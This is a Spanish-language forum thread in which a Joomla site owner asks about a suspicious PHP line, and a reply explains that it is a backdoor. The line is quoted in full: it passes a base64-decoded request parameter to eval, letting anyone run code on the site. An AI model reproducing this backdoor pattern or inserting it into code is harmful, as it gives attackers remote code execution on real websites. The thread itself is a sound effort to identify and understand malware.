04/05/2013, 00:52
| |||
| |||
| virus php ? jomla hola bueno , queria hacerles una consulta, sobre los virus en php.... no se hast que punto puede haber archivos , codigo php, malos... tal vez cuando se usan funciones de "bajo nivel" bueno que es esto?? defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment']))); tenia mi codigo que no andaba, lo comente y ahora funciona? busque en google y dice algo de un troyano, lo conocen,, o lei mal yo ... |
|
04/05/2013, 08:42
| ||||
| ||||
| Respuesta: virus php ? jomla La función defined() comprueba si existe la constante indicada devolviendo true/false según el caso, al agregarle el "or", al devolver false (defined()) se ejecuta el die() por lo cual el código que este después de dicha linea jamás se ejecutará, el problema real es el código siguiente, ya que toma una variable con REQUEST el cual puede tomar la variable de GET, POST o COOKIE con una sola linea, peor aun, el valor devuelto lo pasa por eval() lo cual hace que PHP analice el contenido y lo trate de ejecutar como código PHP, esto es basicamente para inyectar código malicioso en tu sitio con solo pasarle un parametro...
__________________ Listo?, tendría que tener 60 puntos menos de IQ para considerarme listo!!! -- Sheldon Cooper http://twitter.com/nemutagk PD: No contestaré temas vía mensaje personal =) |
| Etiquetas: |
